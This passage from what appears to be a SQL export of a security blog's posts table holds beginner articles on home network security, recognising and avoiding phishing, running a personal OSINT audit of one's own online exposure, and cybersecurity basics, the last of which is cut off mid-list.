set a maximum number of devices that can connect to your network. This not only enhances security but also helps manage bandwidth more efficiently.</li>\r\n</ul>\r\n<h3>Advanced Security Measures</h3>\r\nFor those seeking additional layers of protection, consider implementing the following advanced security measures:\r\n<ul>\r\n 	<li><strong>Use a VPN (Virtual Private Network)</strong>: A VPN encrypts your internet connection, providing an extra layer of privacy and security. It’s particularly useful for securing your network when accessing public Wi-Fi.</li>\r\n 	<li><strong>Enable MAC Address Filtering</strong>: MAC address filtering allows you to specify which devices can connect to your network based on their unique MAC addresses. While this feature adds security, it requires manual configuration and may not be user-friendly for all households.</li>\r\n 	<li><strong>Segment Your Network</strong>: If you have many devices with varying security levels, consider creating separate network segments. For example, you can have one network for work-related devices and another for IoT devices. This limits the potential impact of a compromised device.</li>\r\n</ul>\r\nSecuring your home network is not just about protecting your personal information—it’s about safeguarding your entire digital ecosystem. By following the steps outlined in this guide, you can significantly enhance the security of your home network and protect against the growing number of cyber threats. Regularly review and update your security measures to stay ahead of potential vulnerabilities, ensuring your home remains a safe and secure digital environment.', '', NULL, NULL, 1, 'draft', '2024-08-10 02:25:57', '2026-01-12 21:41:44', 'Information Security', 'How to Secure Your Home Network', '', NULL),
(111, 'Understanding Phishing Attacks and How to Avoid Them', 'understanding-phishing-attacks-and-how-to-avoid-them', 'In the ever-evolving landscape of cybersecurity threats, phishing attacks remain one of the most prevalent and dangerous. These attacks exploit human psychology and the trust users place in legitimate-looking emails or websites. To protect yourself and your data, it\'s crucial to understand how phishing works and how to avoid falling victim to these deceptive tactics.\r\n<h3>What is Phishing?</h3>\r\nPhishing is a type of cyber attack where attackers impersonate legitimate entities to deceive individuals into providing sensitive information, such as usernames, passwords, credit card numbers, or other personal details. These attacks typically occur through emails, text messages, or fake websites that appear trustworthy.\r\n<h3>Common Types of Phishing Attacks</h3>\r\n<ol>\r\n 	<li><strong>Email Phishing</strong>: This is the most common form of phishing. Attackers send emails that appear to come from reputable sources, such as banks, online services, or colleagues. These emails often contain urgent messages or threats to prompt immediate action, leading recipients to click on malicious links or download harmful attachments.</li>\r\n 	<li><strong>Spear Phishing</strong>: Unlike broad email phishing campaigns, spear phishing targets specific individuals or organizations. Attackers gather information about their targets to craft personalized messages, increasing the likelihood of success.</li>\r\n 	<li><strong>Whaling</strong>: A subset of spear phishing, whaling targets high-profile individuals within an organization, such as executives or managers. These attacks are highly sophisticated and aim to steal sensitive corporate data or funds.</li>\r\n 	<li><strong>Smishing and Vishing</strong>: These attacks use SMS (smishing) or voice calls (vishing) to trick victims into revealing personal information. Attackers may pose as banks, government agencies, or tech support.</li>\r\n</ol>\r\n<h3><img class=\"wp-image-3353 alignleft\" style=\"font-size: 16px\" src=\"https://infoseclabs.io/wp-content/uploads/2024/08/phishingEmailSample-300x215.png\" alt=\"\" width=\"543\" height=\"389\" />How to Recognize Phishing Attempts</h3>\r\n<ol>\r\n 	<li><strong>Check the Sender\'s Email Address</strong>: Phishing emails often come from addresses that look similar to legitimate ones but have slight variations or misspellings. Always verify the sender\'s email address before taking any action.</li>\r\n 	<li><strong>Look for Suspicious Links</strong>: Hover over links in emails to see the actual URL. If the link looks suspicious or doesn\'t match the sender\'s domain, do not click on it.</li>\r\n 	<li><strong>Beware of Urgency and Threats</strong>: Phishing emails often create a sense of urgency or fear to prompt immediate action. Be cautious of emails that pressure you to act quickly.</li>\r\n 	<li><strong>Check for Grammatical Errors</strong>: Many phishing emails contain spelling and grammatical mistakes. While not always present, errors can be a red flag.</li>\r\n 	<li><strong>Verify Requests for Personal Information</strong>: Legitimate organizations rarely ask for sensitive information via email. If you receive such a request, verify its authenticity through official channels.</li>\r\n</ol>\r\n<h3>How to Protect Yourself from Phishing</h3>\r\n<ol>\r\n 	<li><strong>Use Multi-Factor Authentication (MFA)</strong>: MFA adds an extra layer of security by requiring two or more verification methods to access your accounts. Even if your password is compromised, MFA can prevent unauthorized access.</li>\r\n 	<li><strong>Keep Software Updated</strong>: Regularly update your operating system, browser, and applications to protect against known vulnerabilities that attackers may exploit.</li>\r\n 	<li><strong>Educate Yourself and Others</strong>: Stay informed about the latest phishing tactics and share this knowledge with friends, family, and colleagues. Awareness is a key defense against phishing attacks.</li>\r\n 	<li><strong>Use Security Software</strong>: Install and maintain reputable antivirus and anti-malware software to detect and block malicious activities.</li>\r\n 	<li><strong>Report Phishing Attempts</strong>: Report suspected phishing emails to your email provider and relevant authorities. Many email services have built-in reporting features that help improve their filters.</li>\r\n</ol>\r\nPhishing attacks are a significant threat in today\'s digital world, but by understanding their tactics and knowing how to recognize and avoid them, you can significantly reduce your risk. Stay vigilant, educate yourself and others, and always verify the authenticity of any unsolicited requests for personal information. By taking these precautions, you can help protect yourself and your data from falling into the hands of cybercriminals.', '', NULL, NULL, 1, 'draft', '2024-08-07 14:22:02', '2026-01-12 21:41:44', 'Information Security', 'Understanding Phishing Attacks and How to Avoid Them', '', NULL),
(112, 'How to Conduct a Personal OSINT Audit', 'how-to-conduct-a-personal-osint-audit', '<h3 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>What is OSINT?</strong></h3>\r\nOpen Source Intelligence (OSINT) involves collecting and analyzing publicly available information from various sources to produce actionable intelligence. OSINT is widely used by cybersecurity professionals, law enforcement, journalists, and even individuals to gather information for various purposes.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>Why Conduct a Personal OSINT Audit?</strong></h3>\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>Identify Exposure:</strong> Understand what personal information is available about you online.</li>\r\n 	<li><strong>Mitigate Risks:</strong> Take steps to remove or secure sensitive information.</li>\r\n 	<li><strong>Improve Privacy:</strong> Enhance your overall online privacy and security.</li>\r\n</ul>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>Steps to Conduct a Personal OSINT Audit</strong></h3>\r\n<h4 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>1. Define Your Objectives</strong></h4>\r\nBefore you start, clearly define what you want to achieve with your OSINT audit. Are you looking to find out what personal information is available online? Are you concerned about specific types of data, such as your home address or financial information?\r\n<h4 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>2. Gather Your Tools</strong></h4>\r\nYou\'ll need a few tools to help you collect and analyze data. Here are some recommended tools:\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>Search Engines:</strong> Google, Bing, DuckDuckGo</li>\r\n 	<li><strong>Social Media Search Tools:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.social-searcher.com/\" target=\"_blank\" rel=\"nofollow noopener\">Social Searcher</a></li>\r\n 	<li><strong>Public Records Search:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://pipl.com/\" target=\"_blank\" rel=\"nofollow noopener\">Pipl</a>, <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.spokeo.com/\" target=\"_blank\" rel=\"nofollow noopener\">Spokeo</a></li>\r\n 	<li><strong>Email and Username Search:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://haveibeenpwned.com/\" target=\"_blank\" rel=\"nofollow noopener\">Have I Been Pwned</a>, <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.dehashed.com/\" target=\"_blank\" rel=\"nofollow noopener\">Dehashed</a></li>\r\n 	<li><strong>Reverse Image Search:</strong> Google Images, <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://tineye.com/\" target=\"_blank\" rel=\"nofollow noopener\">TinEye</a></li>\r\n</ul>\r\n<h4 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>3. Search for Your Personal Information</strong></h4>\r\nStart by searching for your name, email addresses, phone numbers, and any other personal identifiers. Use multiple search engines to get a comprehensive view.\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>Google Dorking:</strong> Use advanced search operators to find specific types of information. For example, <code>inurl:\"profile\" \"John Doe\"</code> can help you find profiles associated with your name.</li>\r\n 	<li><strong>Social Media:</strong> Search for your profiles on platforms like Facebook, Twitter, LinkedIn, and Instagram. Check privacy settings and see what information is publicly visible.</li>\r\n 	<li><strong>Public Records:</strong> Use tools like Pipl and Spokeo to find public records associated with your name.</li>\r\n</ul>\r\n<h4 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>4. Analyze the Data</strong></h4>\r\nOnce you\'ve gathered the data, analyze it to identify any sensitive information that could be a potential risk. Look for:\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>Personal Identifiable Information (PII):</strong> Name, address, phone number, email, social security number.</li>\r\n 	<li><strong>Financial Information:</strong> Bank details, credit card numbers.</li>\r\n 	<li><strong>Professional Information:</strong> Job history, professional affiliations.</li>\r\n 	<li><strong>Social Media Activity:</strong> Posts, photos, connections.</li>\r\n</ul>\r\n<h4 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>5. Take Action</strong></h4>\r\nBased on your findings, take steps to secure your information:\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>Remove or Update Information:</strong> Contact websites to remove outdated or sensitive information. Update privacy settings on social media accounts.</li>\r\n 	<li><strong>Use Strong Passwords:</strong> Ensure all your accounts use strong, unique passwords. Consider using a password manager.</li>\r\n 	<li><strong>Enable Two-Factor Authentication:</strong> Add an extra layer of security to your accounts by enabling two-factor authentication.</li>\r\n 	<li><strong>Monitor Your Online Presence:</strong> Set up Google Alerts for your name and other personal identifiers to stay informed about new information that appears online.</li>\r\n</ul>\r\n<h4 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>6. Document Your Findings</strong></h4>\r\nKeep a record of your findings and the actions you\'ve taken. This can help you track your progress and identify any recurring issues.\r\n\r\nConducting a personal OSINT audit is an essential step in protecting your privacy and security online. By understanding what information is publicly available about you and taking steps to secure it, you can significantly reduce your risk of being targeted by cybercriminals or having your personal information misused. Regularly conducting OSINT audits can help you stay on top of your online presence and maintain your privacy in the digital world.\r\n<h4 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>Useful Resources</strong></h4>\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>OSINT Framework:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://osintframework.com/\" target=\"_blank\" rel=\"nofollow noopener\">osintframework.com</a></li>\r\n 	<li><strong>Have I Been Pwned:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://haveibeenpwned.com/\" target=\"_blank\" rel=\"nofollow noopener\">haveibeenpwned.com</a></li>\r\n 	<li><strong>Social Searcher:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.social-searcher.com/\" target=\"_blank\" rel=\"nofollow noopener\">social-searcher.com</a></li>\r\n 	<li><strong>Pipl:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://pipl.com/\" target=\"_blank\" rel=\"nofollow noopener\">pipl.com</a></li>\r\n 	<li><strong>Dehashed:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.dehashed.com/\" target=\"_blank\" rel=\"nofollow noopener\">dehashed.com</a></li>\r\n 	<li><strong>TinEye:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://tineye.com/\" target=\"_blank\" rel=\"nofollow noopener\">tineye.com</a></li>\r\n</ul>\r\nBy following these steps and utilizing the recommended tools, you can effectively conduct a personal OSINT audit and take control of your online presence.', '', NULL, NULL, 1, 'draft', '2024-08-06 22:02:32', '2026-01-12 21:41:44', 'Information Security', 'How to Conduct a Personal OSINT Audit', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(113, 'The Basics of Cybersecurity: A Beginner\'s Guide', 'the-basics-of-cybersecurity-a-beginners-guide', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity has become more crucial than ever as our lives increasingly revolve around digital technology. Whether you\'re managing a small business, keeping up with email communication, or simply browsing the web, understanding <b><strong class=\"font-bold\">cybersecurity basics</strong></b> can help protect sensitive data and avoid costly breaches. This guide will explain the fundamentals of cybersecurity, its importance, and how you can start improving your online safety with practical tips and techniques.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is Cybersecurity?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity refers to the practice of protecting systems, networks, and data from unauthorized access, theft, or damage. It involves a range of tools, processes, and strategies designed to safeguard against digital attacks. Some common forms of threats include malware, ransomware, phishing scams, and denial-of-service (DoS) attacks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By taking proactive steps to secure your online presence, you can prevent these attacks from causing data breaches, financial harm, or disruptions to your operations.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why is Cybersecurity Important?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cyberattacks can affect anyone—from large corporations to individual users. Here\'s why focusing on <b><strong class=\"font-bold\">the importance of cybersecurity</strong></b> is essential:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Safeguards Sensitive Data</strong></b>: Protect personal, financial, and business information from being accessed by unauthorized users.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Prevents Financial Loss</strong></b>: Avoid the high costs of data breaches, which may include fines, legal fees, and loss of trust from customers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Protects Privacy</strong></b>: Ensures that your personal and professional communications remain confidential.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Builds Trust</strong></b>: Establish credibility with clients and stakeholders by demonstrating your commitment to security.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Concepts in Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To build a solid foundation in cybersecurity, here are some essential concepts to know:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. The CIA Triad (Confidentiality, Integrity, Availability)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The CIA Triad is the core model of information security:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Confidentiality</strong></b>: Only authorized individuals can access sensitive information.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Integrity</strong></b>: Ensures the accuracy and reliability of data by protecting it from unauthorized alteration.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Availability</strong></b>: Makes sure authorized users can access information and systems whenever needed.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Types of Cyber Threats</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cyber threats come in many forms. Understanding these will help you recognize and defend against them:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Malware</strong></b>: Malicious software such as viruses, worms, and Trojans designed to damage or disrupt devices.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Phishing</strong></b>: Fraudulent emails or messages that trick users into sharing sensitive information.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Ransomware</strong></b>: Programs that lock users out of their data until a ransom is paid.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Man-in-the-Middle (MitM) Attacks</strong></b>: Cybercriminals intercept and alter communications between two parties.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Denial-of-Service (DoS) Attacks</strong></b>: Overload a website or network with traffic to prevent normal operations.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Cybersecurity Tools and Practices</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Several tools and techniques can fortify your online security:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Firewalls</strong></b>: Controls network traffic to block unauthorized access.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Antivirus Software</strong></b>: Detects and removes malicious programs.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Encryption</strong></b>: Protects data by converting it into indecipherable code.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Multi-Factor Authentication (MFA)</strong></b>: Adds extra verification steps to secure accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Regular Updates</strong></b>: Keeps software patched to defend against vulnerabilities.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Cybersecurity Tips and Best Practices</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Want to secure your digital presence? Follow these <b><strong class=\"font-bold\">cybersecurity best practices</strong></b> to reduce risks and build a safe online environment.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Develop Strong Cyber Hygiene</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use strong, unique passwords for each account and store them securely with a password manager.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Enable <b><strong class=\"font-bold\">two-factor authentication</strong></b> wherever possible for enhanced account security.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Regularly update your software to ensure you’re protected against the latest threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Be cautious when clicking on links or downloading attachments in emails. Avoid falling victim to <b><strong class=\"font-bold\">preventing email scams</strong></b> by verifying the sender.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Explore Cybersecurity Tools</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Protect your devices with reliable antivirus software.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Set up a firewall to monitor network activity for suspicious behavior.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Encrypt sensitive data, especially when transmitting it over public networks.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Identify and Avoid Phishing Scams</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing scams can be difficult to spot, but here’s how to protect yourself:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Look for suspicious email addresses or domains.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Avoid clicking on unsolicited links or opening unexpected attachments.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Report potential phishing messages to IT or email providers.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Stay Vigilant with Open Source Intelligence (OSINT)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Harness <b><strong class=\"font-bold\">OSINT techniques</strong></b> to gather publicly available information to secure your systems. For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use search engines like Google to monitor potential data breaches involving your personal or business information.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Stay updated on the latest cybersecurity trends using trusted sources like blogs and forums.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Beginner’s Roadmap to Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Starting your cybersecurity learning journey can feel overwhelming. But with the right steps, you can build your knowledge quickly and effectively. Here\'s how you can start:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Understand the Basics</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Learn the key concepts covered in this guide, such as the CIA Triad, types of threats, and core tools.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 